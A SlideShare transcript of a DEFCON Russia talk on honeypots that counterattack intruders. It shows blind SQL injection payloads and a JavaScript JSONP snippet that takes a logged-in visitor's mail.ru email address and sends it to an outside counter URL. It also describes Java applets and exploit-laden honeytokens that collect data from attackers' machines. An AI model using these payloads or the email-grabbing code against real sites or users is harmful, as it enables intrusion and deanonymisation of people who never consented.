SlideShare una empresa de Scribd logo
1 de 50
Alexey Sintsov
@asintsov
DEFCON RUSSIA DC#7812
HONEYPOT THAT CAN BITE: REVERSE
PENETRATION
#WHOAMI
• Senior Security Engineer at
• Writer at
• Ideology and co-organizer of
• Co-Founder of
ZeroNights
#DISCLAIMER
• This story is not connected to my EMPLOYER
• All LIVE data was got from Q2 2011 – Q3 2012
• It was done only for research purposes.
• All data was shared with NOBODY.
• Thx to Alexey Tyurin (@antyurin)
#WHAT IS IT ABOUT
honeypot
• Attract attacker‟s attention (to HoneyPot)
• Get patterns and actions from an attacker behavior
Then Operator can understand what kind of attacker we
have, what he can do in the future and etc. After that we can
Take some „preventative‟ actions.
Example 1. Bot search for PHP LFI bug in PMA
Def. actions:
1) Do we have PMA?
2) Are our PMA installation accessible from
the Internet?
3) Bug fixed?
// but the same we can get from IDS…
Example 2. SQLi attempt. Dumping hashes.
Def. actions:
1) What kind of SQLi he tried to exploit –
let‟s check our web-apps for
same SQLi patterns
2) Check hashes in our databases – is it
salted?
Do we have hashes at all? (or
plain text?)
3) Check access to tables , is it possible to
get access by using „web‟ account?
#WHAT IS IT ABOUT
classic…
IDS Alert
SQLi attempt in some .php
Is it vulnerable?
What attacker
did?
Log/traffic
analysis
Src analysis/
manual
validation
Who is the
attacker?
- Was he looking for
something special?
- Is he going to
comeback?
- How we should be prepared?
Deploy the Incident Response Team
© InfoSecReactions
By @windsheep_
#WHOIS THE ATTACKER
WhiteHats?
#WHOIS THE ATTACKER
Why?
I do not care, main task – fix the bug!
vs.
It‟s interesting, I want to track him!
#WHOIS THE ATTACKER
Who wants to know…
• Enterprise
- Who is hunting us like that?
(oil‟s sector/big R&D)
It is always good to know who has started this activity….
Because if it is just kids, it is one thing,
if government or competitors – another thing.
• Government
- Track cybercrimes
- Track another government… cyber war, blah-blah-blah…
- etc …
#WHOIS THE ATTACKER
IDS/Logs
• IP address - TOR/(chain of)Proxy/BOTnet
• User-Agent - lol
We have sniffed got nothing…..
#HONEYPOT
What I want?
• Fast result: attack or false positive?
• Is it a targeted attack? Or just a scan from botnet?
• Is it a professional or kiddie
• Decloaking the attacker
• Track the attacker
#Offensive
“The only real defence is active defence“
© Mao Zedong
• Hack your enemy first (aggressive)
• Hack your enemy back (defensive)
#Offensive
Not new…
AV/Security companies - to take down botnet:
• Hacking C&C
• Hacking chain of BOTs
• Hacking Admin‟s workstation
© Andrzej Dereszowski, SIGNAL 11, CONFIDence, 2010
#Offensive
We can do more…
“Replay back” – answer with the same exploit back to the source:
• SSH Brute force attack
- if the source has SSH service
- replay with the same login/pass
-- attacker has already changed password on pwned box
• PHP/Perl/Ruby web attacks
- if the source has HTTP service
- replay back with same URI/payload
It is against BOTs, and will not work against real attacker.
#Offensive
WWW
• Is it (the attacker) HUMAN?
• Is he using well-know application (browser/plugins)?
• Can we EXPLOIT it?
Classical ExploitPACK?
#Honeypot
Skills?
Bug  Vulnerability  Exploit  Attack
Can be found automatically
SHOULD be found during manual tests
SHOULD be executed by the attacker
with browser!
Attacker’s level of skills
• Low
• Medium
• High!
• Dangerous, we are
doomed!!!11
#Honeypot
Trap
• DIRBuster attack, give them /admin/admin.php
But what is the password?
// We can detect bruteforce attacks…
• /admin/help.php?id=1 <--SQL Injection
Get password for admin.php
• Login with stolen password to /admin/admin.php
• Attack complete!
#Honeypot
Blind SQL Injection (SQLite)
„ - 500 Error.
This is a bug
„/**/AND/**/ „1‟ /**/like„1‟--
- 200.
This is a vulnerability
„union/**/select(CASE/**/WHEN/**/
sqlite_version()like'3.%'THEN/**/
select(1)from(lololo)ELSE‟BHEU13‟
END)
- 200/500.
This is an exploit
Skill-O-Meter
Additional to Skill-O-Metr
• Filtered Symbols, like „space‟
• WAF with small „holes‟
• etc, like CTF tasks or hackquest…
#Honeypot
Attack
„union/**/select(CASE/**/WHEN(select/**/password/**/from/**/
users/**/where/**/user=„admin‟and/**/password/**/like/‟a%‟)THEN/**/
select(1)from(lololo)ELSE‟PHDays13‟END)
SQLite supports triggers…
#Honeypot
…can bite!
• For each step we can get:
o Human/automated attack (Skill-O-Meter)
o The malicious intention of an attacker
 WhiteHat will finish after finding a SQLi vulnerability. He will not attempt
to get access to forbidden part (admin.php)!
 Ok, ok… even if he got access to admin.php he do not try to get „secret.pdf‟ =)
• On each step we can bite…
o On „attack step‟ we can counterattack…
#Counterattack
What we can?
• Attack his browser/plugins
• 1day/0day exploits
• Social engineering
• Evil Java applet/ActiveX (GUI for administration…)
• Honeytokens
• Attack his env. using a browser.
• Third party services (web-mail/social networks/etc)
• Local env. (localhost/dsl-router)
#Social Engineering
Honeytokens
• PDF file with secret information (and with exploit…)
• EXE file with secret application (fat client for SCADA…)
• etc….
#Backdoor… ?
No – “detective”
• Get jpg/txt/doc files from FS
• Get config files (VPN)
• Get BSSIDs
• Get network/domain configuration
• Get traceroute to us
• Get DNS to us
• Get camera-shot, mic recording
• etc…
#Target
• Reverse DNS channel
• ipconfig
• tracert
• Domain name
• Login name
• …
• DO NOT COLLECT PERSONAL INFO
• DO NOT GET ANY DATA FROM HDD
• REMOTE CONTROL DISABLED
#Results
GET requests log
It can be WEB proxy or TOR exit point…
Data from attacker’s PC
#Results
Real logins – second names
Real host-names and domains
Real ISP, IP addresses
#Results
Write-up about First DCG meeting in Russia…
habrahabr.ru  Most technical Russian IT community…
Comments…“ If someone wants invite: ‘ or 1=1– “
#Hello “Red May” 2011
GET requests log
No success with SE or reverse penetration… I am lucky…
#Unexpected
GET requests log
One beautiful
Ex-USSR republic…
Nothing special…
Damn! Special-Super-Secret-Service
of beautiful ex-USSR republic…
Looks like „service‟ username, not
personal… may be it was compromised?
#More drama
… few hours latter, another intrusion to DCG web-site
… from same ex-USSR republic, same city….
… but another subnet
… and again – “reverse penetration”
Known nickname, you can Google him as know hacker form this ex-USSR republic..
may be he is working for this Secret Service
… or compromise this host and use as intermediate…
#Results
• Whitehat‟s companies – have tested our Applet!
• Independent whitehat researchers…
• Backdoored government WS….
• Script kiddies…
#Conclusion
It works!
• We got real usernames of those who did not use VMware/and middle hosts
• We got real source for those who use VMware/TOR/Proxy and did not use middle hosts
• We got intermediate hosts, but we can detect it, end got
• We got configured DNS server address
• And we got it automatically…
The same results possible for honey
token/exploit-back techniques…
SE: Attacker is not expecting back-attack!
#But
Some attackers are careful
//@ahack_ru had known about Honeypot and Java applet and did not run it…
but he was busted anyway!
#Can we attack 3rd party services?
If user is authenticated on others services
HoneyPot
Attacker
SocialNetwork
• Attack begins
• CSRF/XSS attack…
• Callback with ID….
• Proxy/TOR/VPN – it is not about network!
• Works only vs. script-kiddies and whitehats
#Linkedin
#Yandex JSONP
#mail.ru JSONP
Hack 1: SSL
Hack 2: <iframe
src=“data:…
By Egor Homakov
document.write("<iframe src='data:text/html,<html><body>
<script>var sss = document.createElement("script");
sss.src=“
http://swa.mail.ru/cgi-bin/counters?JSONP_call=PortalHeadlineJSONPCallback&132417612
";
function PortalHeadlineJSONPCallback(objFromMail){
var arr1=objFromMail["data"];
var i = new Image();
i.src = "http://defcon-russia.ru/counter.php?"+arr1["email"];
document.body.appendChild(i);
};
document.body.appendChild(sss);
</script>
</body></html>'>");
#mail.ru exploit
#Results
#Conclusion
It works!
• We got real emails
• We got real names
• We can do correlation between two e-mail addresses
and Java Applet response
• And we got it automatically…
#Conclusion
Stats!
• SQLi attacks - 484 (~1.2 years)
• Applet strikes - 52 (~1.2 years)
• Mail grabs - 16 (6 month)
~ 17% success
#Conclusion
Public announcements of
DC Rus
First
meeting
Second
meeting
Sixth meeting
announcement,
pre-Zeronights era
#Conclusion
Everybody likes graphics =)
#Moarrrrrrrrr
Local env. can be attacked!
• Anti DNS pinning / DNS rebinding
• XXXSS by Samy Kamkar (Getting BSSIDs…)
• CSRF/XSS on any local resources….
• There can be million techniques and tricks for that…
#SE – Custom software
Anti-Cybercrime
Login
Detect
fraud/hack
attempt
Classic
ActiveX/Java
Backdoored
ActiveX/Java
Work…
Error/
Meintance
#SE – Custom software
Government level
• SCADA
• Army systems
• FSB/KGB/CIA/MI6/…
• etc..
#SE – Custom software
Наши поделки?
#Conclusion
• Counterattack can work…
• Whitehats are LESS carful when testing something…
• ????
• Moral/Legal
#FIN
alex.sintsov@gmail.com @asintsov

Más contenido relacionado

La actualidad más candente

Recon-Fu @BsidesKyiv 2016
Recon-Fu @BsidesKyiv 2016Recon-Fu @BsidesKyiv 2016
Recon-Fu @BsidesKyiv 2016Vlad Styran
 
Sandbox detection: leak, abuse, test - Hacktivity 2015
Sandbox detection: leak, abuse, test - Hacktivity 2015Sandbox detection: leak, abuse, test - Hacktivity 2015
Sandbox detection: leak, abuse, test - Hacktivity 2015Zoltan Balazs
 
Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek
Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka IrongeekMutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek
Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka IrongeekMagno Logan
 
Peerlyst Delhi NCR Chapter Meet
Peerlyst Delhi NCR Chapter MeetPeerlyst Delhi NCR Chapter Meet
Peerlyst Delhi NCR Chapter MeetAbhinav Mishra
 
How to Build Your Own Physical Pentesting Go-bag
How to Build Your Own Physical Pentesting Go-bagHow to Build Your Own Physical Pentesting Go-bag
How to Build Your Own Physical Pentesting Go-bagBeau Bullock
 
IDA Vulnerabilities and Bug Bounty  by Masaaki Chida
IDA Vulnerabilities and Bug Bounty  by Masaaki ChidaIDA Vulnerabilities and Bug Bounty  by Masaaki Chida
IDA Vulnerabilities and Bug Bounty  by Masaaki ChidaCODE BLUE
 
[CONFidence 2016] Leszek Miś - Honey(pot) flavored hunt for cyber enemy
[CONFidence 2016] Leszek Miś - Honey(pot) flavored hunt for cyber enemy[CONFidence 2016] Leszek Miś - Honey(pot) flavored hunt for cyber enemy
[CONFidence 2016] Leszek Miś - Honey(pot) flavored hunt for cyber enemyPROIDEA
 
Security Testing: Fuzzing
Security Testing: FuzzingSecurity Testing: Fuzzing
Security Testing: FuzzingAndrei Rubaniuk
 
REST API Pentester's perspective
REST API Pentester's perspectiveREST API Pentester's perspective
REST API Pentester's perspectiveSecuRing
 
Ultimate Guide to Setup DarkComet with NoIP
Ultimate Guide to Setup DarkComet with NoIPUltimate Guide to Setup DarkComet with NoIP
Ultimate Guide to Setup DarkComet with NoIPPich Pra Tna
 
Nightmares of a Penetration Tester ( How to protect your network)
Nightmares of a Penetration Tester ( How to protect your network)Nightmares of a Penetration Tester ( How to protect your network)
Nightmares of a Penetration Tester ( How to protect your network)Chris Nickerson
 

La actualidad más candente (11)

Recon-Fu @BsidesKyiv 2016
Recon-Fu @BsidesKyiv 2016Recon-Fu @BsidesKyiv 2016
Recon-Fu @BsidesKyiv 2016
 
Sandbox detection: leak, abuse, test - Hacktivity 2015
Sandbox detection: leak, abuse, test - Hacktivity 2015Sandbox detection: leak, abuse, test - Hacktivity 2015
Sandbox detection: leak, abuse, test - Hacktivity 2015
 
Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek
Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka IrongeekMutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek
Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek
 
Peerlyst Delhi NCR Chapter Meet
Peerlyst Delhi NCR Chapter MeetPeerlyst Delhi NCR Chapter Meet
Peerlyst Delhi NCR Chapter Meet
 
How to Build Your Own Physical Pentesting Go-bag
How to Build Your Own Physical Pentesting Go-bagHow to Build Your Own Physical Pentesting Go-bag
How to Build Your Own Physical Pentesting Go-bag
 
IDA Vulnerabilities and Bug Bounty  by Masaaki Chida
IDA Vulnerabilities and Bug Bounty  by Masaaki ChidaIDA Vulnerabilities and Bug Bounty  by Masaaki Chida
IDA Vulnerabilities and Bug Bounty  by Masaaki Chida
 
[CONFidence 2016] Leszek Miś - Honey(pot) flavored hunt for cyber enemy
[CONFidence 2016] Leszek Miś - Honey(pot) flavored hunt for cyber enemy[CONFidence 2016] Leszek Miś - Honey(pot) flavored hunt for cyber enemy
[CONFidence 2016] Leszek Miś - Honey(pot) flavored hunt for cyber enemy
 
Security Testing: Fuzzing
Security Testing: FuzzingSecurity Testing: Fuzzing
Security Testing: Fuzzing
 
REST API Pentester's perspective
REST API Pentester's perspectiveREST API Pentester's perspective
REST API Pentester's perspective
 
Ultimate Guide to Setup DarkComet with NoIP
Ultimate Guide to Setup DarkComet with NoIPUltimate Guide to Setup DarkComet with NoIP
Ultimate Guide to Setup DarkComet with NoIP
 
Nightmares of a Penetration Tester ( How to protect your network)
Nightmares of a Penetration Tester ( How to protect your network)Nightmares of a Penetration Tester ( How to protect your network)
Nightmares of a Penetration Tester ( How to protect your network)
 

Destacado

Aндрей Mасалович. Конкурентная разведка в Интернете.
Aндрей Mасалович. Конкурентная разведка в Интернете.Aндрей Mасалович. Конкурентная разведка в Интернете.
Aндрей Mасалович. Конкурентная разведка в Интернете.Positive Hack Days
 
Phd2013 lyamin Высокий пакетрейт на x86-64, берем планку 14.88Mpps
Phd2013 lyamin  Высокий пакетрейт на  x86-64, берем планку 14.88MppsPhd2013 lyamin  Высокий пакетрейт на  x86-64, берем планку 14.88Mpps
Phd2013 lyamin Высокий пакетрейт на x86-64, берем планку 14.88MppsAlexander Lyamin
 
Pentadbiran buruh di malaysia kajian kes terkini
Pentadbiran buruh di malaysia kajian kes terkiniPentadbiran buruh di malaysia kajian kes terkini
Pentadbiran buruh di malaysia kajian kes terkinirashidin76
 
Сообщество DevOpsHQ: идеология и инструменты | Александр Паздников
Сообщество DevOpsHQ: идеология и инструменты | Александр ПаздниковСообщество DevOpsHQ: идеология и инструменты | Александр Паздников
Сообщество DevOpsHQ: идеология и инструменты | Александр ПаздниковPositive Hack Days
 
Общая концепция системы развёртывания серверного окружения на базе SaltStack ...
Общая концепция системы развёртывания серверного окружения на базе SaltStack ...Общая концепция системы развёртывания серверного окружения на базе SaltStack ...
Общая концепция системы развёртывания серверного окружения на базе SaltStack ...Positive Hack Days
 

Destacado (9)

Aндрей Mасалович. Конкурентная разведка в Интернете.
Aндрей Mасалович. Конкурентная разведка в Интернете.Aндрей Mасалович. Конкурентная разведка в Интернете.
Aндрей Mасалович. Конкурентная разведка в Интернете.
 
Phd2013 lyamin Высокий пакетрейт на x86-64, берем планку 14.88Mpps
Phd2013 lyamin  Высокий пакетрейт на  x86-64, берем планку 14.88MppsPhd2013 lyamin  Высокий пакетрейт на  x86-64, берем планку 14.88Mpps
Phd2013 lyamin Высокий пакетрейт на x86-64, берем планку 14.88Mpps
 
Этичный хакинг
Этичный хакингЭтичный хакинг
Этичный хакинг
 
Pentadbiran buruh di malaysia kajian kes terkini
Pentadbiran buruh di malaysia kajian kes terkiniPentadbiran buruh di malaysia kajian kes terkini
Pentadbiran buruh di malaysia kajian kes terkini
 
Сообщество DevOpsHQ: идеология и инструменты | Александр Паздников
Сообщество DevOpsHQ: идеология и инструменты | Александр ПаздниковСообщество DevOpsHQ: идеология и инструменты | Александр Паздников
Сообщество DevOpsHQ: идеология и инструменты | Александр Паздников
 
Общая концепция системы развёртывания серверного окружения на базе SaltStack ...
Общая концепция системы развёртывания серверного окружения на базе SaltStack ...Общая концепция системы развёртывания серверного окружения на базе SaltStack ...
Общая концепция системы развёртывания серверного окружения на базе SaltStack ...
 
Tapping into the core
Tapping into the coreTapping into the core
Tapping into the core
 
пр про SOC для ФСТЭК
пр про SOC для ФСТЭКпр про SOC для ФСТЭК
пр про SOC для ФСТЭК
 
пр Спроси эксперта про прогнозы ИБ
пр Спроси эксперта про прогнозы ИБпр Спроси эксперта про прогнозы ИБ
пр Спроси эксперта про прогнозы ИБ
 

Similar a Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration.

BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns...
BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns...BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns...
BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns...Andrew Morris
 
44CON @ IPexpo - You're fighting an APT with what exactly?
44CON @ IPexpo - You're fighting an APT with what exactly?44CON @ IPexpo - You're fighting an APT with what exactly?
44CON @ IPexpo - You're fighting an APT with what exactly?44CON
 
BlueHat v18 || The matrix has you - protecting linux using deception
BlueHat v18 || The matrix has you - protecting linux using deceptionBlueHat v18 || The matrix has you - protecting linux using deception
BlueHat v18 || The matrix has you - protecting linux using deceptionBlueHat Security Conference
 
Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd
Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. LtdBeyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd
Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. LtdNipun Jaswal
 
How to hide your browser 0-days
How to hide your browser 0-daysHow to hide your browser 0-days
How to hide your browser 0-daysZoltan Balazs
 
AlienVault Brute Force Attacks- Keeping the Bots at Bay with AlienVault USM +...
AlienVault Brute Force Attacks- Keeping the Bots at Bay with AlienVault USM +...AlienVault Brute Force Attacks- Keeping the Bots at Bay with AlienVault USM +...
AlienVault Brute Force Attacks- Keeping the Bots at Bay with AlienVault USM +...AlienVault
 
Playing with fuzz bunch and danderspritz
Playing with fuzz bunch and danderspritzPlaying with fuzz bunch and danderspritz
Playing with fuzz bunch and danderspritzDeepanshu Gajbhiye
 
Abusing "Accepted Risk" With 3rd Party C2 - HackMiamiCon5
Abusing "Accepted Risk" With 3rd Party C2 - HackMiamiCon5Abusing "Accepted Risk" With 3rd Party C2 - HackMiamiCon5
Abusing "Accepted Risk" With 3rd Party C2 - HackMiamiCon5sixdub
 
Ransomware - what is it, how to protect against it
Ransomware - what is it, how to protect against itRansomware - what is it, how to protect against it
Ransomware - what is it, how to protect against itZoltan Balazs
 
Workshop on Network Security
Workshop on Network SecurityWorkshop on Network Security
Workshop on Network SecurityUC San Diego
 
Hunt for the red DA
Hunt for the red DAHunt for the red DA
Hunt for the red DANeil Lines
 
Let’s play the game. Yet another way to perform penetration test. Russian “re...
Let’s play the game. Yet another way to perform penetration test. Russian “re...Let’s play the game. Yet another way to perform penetration test. Russian “re...
Let’s play the game. Yet another way to perform penetration test. Russian “re...Kirill Ermakov
 
Honeypots for Active Defense
Honeypots for Active DefenseHoneypots for Active Defense
Honeypots for Active DefenseGreg Foss
 
Information security & ethical hacking
Information security & ethical hackingInformation security & ethical hacking
Information security & ethical hackingeiti panchkula
 
Phd III - defending enterprise
Phd III - defending enterprise Phd III - defending enterprise
Phd III - defending enterprise F _
 
Cyber security & gaming - LevelUp! 2018 - v.3.1
Cyber security & gaming - LevelUp! 2018 - v.3.1Cyber security & gaming - LevelUp! 2018 - v.3.1
Cyber security & gaming - LevelUp! 2018 - v.3.1Fabrizio Cilli
 
Thoughts on Defensive Development for Sitecore
Thoughts on Defensive Development for SitecoreThoughts on Defensive Development for Sitecore
Thoughts on Defensive Development for SitecorePINT Inc
 
Overview of information security
Overview of information securityOverview of information security
Overview of information securityAskao Ahmed Saad
 
My tryst with sourcecode review
My tryst with sourcecode reviewMy tryst with sourcecode review
My tryst with sourcecode reviewAnant Shrivastava
 

Similar a Alexey Sintsov. Honeypot that Can Bite: Reverse Penetration. (20)

BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns...
BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns...BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns...
BSidesCharleston2014 - Ballin on a Budget: Tracking Chinese Malware Campaigns...
 
How to hack or what is ethical hacking
How to hack or what is ethical hackingHow to hack or what is ethical hacking
How to hack or what is ethical hacking
 
44CON @ IPexpo - You're fighting an APT with what exactly?
44CON @ IPexpo - You're fighting an APT with what exactly?44CON @ IPexpo - You're fighting an APT with what exactly?
44CON @ IPexpo - You're fighting an APT with what exactly?
 
BlueHat v18 || The matrix has you - protecting linux using deception
BlueHat v18 || The matrix has you - protecting linux using deceptionBlueHat v18 || The matrix has you - protecting linux using deception
BlueHat v18 || The matrix has you - protecting linux using deception
 
Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd
Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. LtdBeyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd
Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd
 
How to hide your browser 0-days
How to hide your browser 0-daysHow to hide your browser 0-days
How to hide your browser 0-days
 
AlienVault Brute Force Attacks- Keeping the Bots at Bay with AlienVault USM +...
AlienVault Brute Force Attacks- Keeping the Bots at Bay with AlienVault USM +...AlienVault Brute Force Attacks- Keeping the Bots at Bay with AlienVault USM +...
AlienVault Brute Force Attacks- Keeping the Bots at Bay with AlienVault USM +...
 
Playing with fuzz bunch and danderspritz
Playing with fuzz bunch and danderspritzPlaying with fuzz bunch and danderspritz
Playing with fuzz bunch and danderspritz
 
Abusing "Accepted Risk" With 3rd Party C2 - HackMiamiCon5
Abusing "Accepted Risk" With 3rd Party C2 - HackMiamiCon5Abusing "Accepted Risk" With 3rd Party C2 - HackMiamiCon5
Abusing "Accepted Risk" With 3rd Party C2 - HackMiamiCon5
 
Ransomware - what is it, how to protect against it
Ransomware - what is it, how to protect against itRansomware - what is it, how to protect against it
Ransomware - what is it, how to protect against it
 
Workshop on Network Security
Workshop on Network SecurityWorkshop on Network Security
Workshop on Network Security
 
Hunt for the red DA
Hunt for the red DAHunt for the red DA
Hunt for the red DA
 
Let’s play the game. Yet another way to perform penetration test. Russian “re...
Let’s play the game. Yet another way to perform penetration test. Russian “re...Let’s play the game. Yet another way to perform penetration test. Russian “re...
Let’s play the game. Yet another way to perform penetration test. Russian “re...
 
Honeypots for Active Defense
Honeypots for Active DefenseHoneypots for Active Defense
Honeypots for Active Defense
 
Information security & ethical hacking
Information security & ethical hackingInformation security & ethical hacking
Information security & ethical hacking
 
Phd III - defending enterprise
Phd III - defending enterprise Phd III - defending enterprise
Phd III - defending enterprise
 
Cyber security & gaming - LevelUp! 2018 - v.3.1
Cyber security & gaming - LevelUp! 2018 - v.3.1Cyber security & gaming - LevelUp! 2018 - v.3.1
Cyber security & gaming - LevelUp! 2018 - v.3.1
 
Thoughts on Defensive Development for Sitecore
Thoughts on Defensive Development for SitecoreThoughts on Defensive Development for Sitecore
Thoughts on Defensive Development for Sitecore
 
Overview of information security
Overview of information securityOverview of information security
Overview of information security
 
My tryst with sourcecode review
My tryst with sourcecode reviewMy tryst with sourcecode review
My tryst with sourcecode review
 

Más de Positive Hack Days

Инструмент ChangelogBuilder для автоматической подготовки Release Notes
Инструмент ChangelogBuilder для автоматической подготовки Release NotesИнструмент ChangelogBuilder для автоматической подготовки Release Notes
Инструмент ChangelogBuilder для автоматической подготовки Release NotesPositive Hack Days
 
Как мы собираем проекты в выделенном окружении в Windows Docker
Как мы собираем проекты в выделенном окружении в Windows DockerКак мы собираем проекты в выделенном окружении в Windows Docker
Как мы собираем проекты в выделенном окружении в Windows DockerPositive Hack Days
 
Типовая сборка и деплой продуктов в Positive Technologies
Типовая сборка и деплой продуктов в Positive TechnologiesТиповая сборка и деплой продуктов в Positive Technologies
Типовая сборка и деплой продуктов в Positive TechnologiesPositive Hack Days
 
Аналитика в проектах: TFS + Qlik
Аналитика в проектах: TFS + QlikАналитика в проектах: TFS + Qlik
Аналитика в проектах: TFS + QlikPositive Hack Days
 
Использование анализатора кода SonarQube
Использование анализатора кода SonarQubeИспользование анализатора кода SonarQube
Использование анализатора кода SonarQubePositive Hack Days
 
Развитие сообщества Open DevOps Community
Развитие сообщества Open DevOps CommunityРазвитие сообщества Open DevOps Community
Развитие сообщества Open DevOps CommunityPositive Hack Days
 
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...Positive Hack Days
 
Автоматизация построения правил для Approof
Автоматизация построения правил для ApproofАвтоматизация построения правил для Approof
Автоматизация построения правил для ApproofPositive Hack Days
 
Мастер-класс «Трущобы Application Security»
Мастер-класс «Трущобы Application Security»Мастер-класс «Трущобы Application Security»
Мастер-класс «Трущобы Application Security»Positive Hack Days
 
Формальные методы защиты приложений
Формальные методы защиты приложенийФормальные методы защиты приложений
Формальные методы защиты приложенийPositive Hack Days
 
Эвристические методы защиты приложений
Эвристические методы защиты приложенийЭвристические методы защиты приложений
Эвристические методы защиты приложенийPositive Hack Days
 
Теоретические основы Application Security
Теоретические основы Application SecurityТеоретические основы Application Security
Теоретические основы Application SecurityPositive Hack Days
 
От экспериментального программирования к промышленному: путь длиной в 10 лет
От экспериментального программирования к промышленному: путь длиной в 10 летОт экспериментального программирования к промышленному: путь длиной в 10 лет
От экспериментального программирования к промышленному: путь длиной в 10 летPositive Hack Days
 
Уязвимое Android-приложение: N проверенных способов наступить на грабли
Уязвимое Android-приложение: N проверенных способов наступить на граблиУязвимое Android-приложение: N проверенных способов наступить на грабли
Уязвимое Android-приложение: N проверенных способов наступить на граблиPositive Hack Days
 
Требования по безопасности в архитектуре ПО
Требования по безопасности в архитектуре ПОТребования по безопасности в архитектуре ПО
Требования по безопасности в архитектуре ПОPositive Hack Days
 
Формальная верификация кода на языке Си
Формальная верификация кода на языке СиФормальная верификация кода на языке Си
Формальная верификация кода на языке СиPositive Hack Days
 
Механизмы предотвращения атак в ASP.NET Core
Механизмы предотвращения атак в ASP.NET CoreМеханизмы предотвращения атак в ASP.NET Core
Механизмы предотвращения атак в ASP.NET CorePositive Hack Days
 
SOC для КИИ: израильский опыт
SOC для КИИ: израильский опытSOC для КИИ: израильский опыт
SOC для КИИ: израильский опытPositive Hack Days
 
Honeywell Industrial Cyber Security Lab & Services Center
Honeywell Industrial Cyber Security Lab & Services CenterHoneywell Industrial Cyber Security Lab & Services Center
Honeywell Industrial Cyber Security Lab & Services CenterPositive Hack Days
 
Credential stuffing и брутфорс-атаки
Credential stuffing и брутфорс-атакиCredential stuffing и брутфорс-атаки
Credential stuffing и брутфорс-атакиPositive Hack Days
 

Más de Positive Hack Days (20)

Инструмент ChangelogBuilder для автоматической подготовки Release Notes
Инструмент ChangelogBuilder для автоматической подготовки Release NotesИнструмент ChangelogBuilder для автоматической подготовки Release Notes
Инструмент ChangelogBuilder для автоматической подготовки Release Notes
 
Как мы собираем проекты в выделенном окружении в Windows Docker
Как мы собираем проекты в выделенном окружении в Windows DockerКак мы собираем проекты в выделенном окружении в Windows Docker
Как мы собираем проекты в выделенном окружении в Windows Docker
 
Типовая сборка и деплой продуктов в Positive Technologies
Типовая сборка и деплой продуктов в Positive TechnologiesТиповая сборка и деплой продуктов в Positive Technologies
Типовая сборка и деплой продуктов в Positive Technologies
 
Аналитика в проектах: TFS + Qlik
Аналитика в проектах: TFS + QlikАналитика в проектах: TFS + Qlik
Аналитика в проектах: TFS + Qlik
 
Использование анализатора кода SonarQube
Использование анализатора кода SonarQubeИспользование анализатора кода SonarQube
Использование анализатора кода SonarQube
 
Развитие сообщества Open DevOps Community
Развитие сообщества Open DevOps CommunityРазвитие сообщества Open DevOps Community
Развитие сообщества Open DevOps Community
 
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...
Методика определения неиспользуемых ресурсов виртуальных машин и автоматизаци...
 
Автоматизация построения правил для Approof
Автоматизация построения правил для ApproofАвтоматизация построения правил для Approof
Автоматизация построения правил для Approof
 
Мастер-класс «Трущобы Application Security»
Мастер-класс «Трущобы Application Security»Мастер-класс «Трущобы Application Security»
Мастер-класс «Трущобы Application Security»
 
Формальные методы защиты приложений
Формальные методы защиты приложенийФормальные методы защиты приложений
Формальные методы защиты приложений
 
Эвристические методы защиты приложений
Эвристические методы защиты приложенийЭвристические методы защиты приложений
Эвристические методы защиты приложений
 
Теоретические основы Application Security
Теоретические основы Application SecurityТеоретические основы Application Security
Теоретические основы Application Security
 
От экспериментального программирования к промышленному: путь длиной в 10 лет
От экспериментального программирования к промышленному: путь длиной в 10 летОт экспериментального программирования к промышленному: путь длиной в 10 лет
От экспериментального программирования к промышленному: путь длиной в 10 лет
 
Уязвимое Android-приложение: N проверенных способов наступить на грабли
Уязвимое Android-приложение: N проверенных способов наступить на граблиУязвимое Android-приложение: N проверенных способов наступить на грабли
Уязвимое Android-приложение: N проверенных способов наступить на грабли
 
Требования по безопасности в архитектуре ПО
Требования по безопасности в архитектуре ПОТребования по безопасности в архитектуре ПО
Требования по безопасности в архитектуре ПО
 
Формальная верификация кода на языке Си
Формальная верификация кода на языке СиФормальная верификация кода на языке Си
Формальная верификация кода на языке Си
 
Механизмы предотвращения атак в ASP.NET Core
Механизмы предотвращения атак в ASP.NET CoreМеханизмы предотвращения атак в ASP.NET Core
Механизмы предотвращения атак в ASP.NET Core
 
SOC для КИИ: израильский опыт
SOC для КИИ: израильский опытSOC для КИИ: израильский опыт
SOC для КИИ: израильский опыт
 
Honeywell Industrial Cyber Security Lab & Services Center
Honeywell Industrial Cyber Security Lab & Services CenterHoneywell Industrial Cyber Security Lab & Services Center
Honeywell Industrial Cyber Security Lab & Services Center
 
Credential stuffing и брутфорс-атаки
Credential stuffing и брутфорс-атакиCredential stuffing и брутфорс-атаки
Credential stuffing и брутфорс-атаки
 

Último

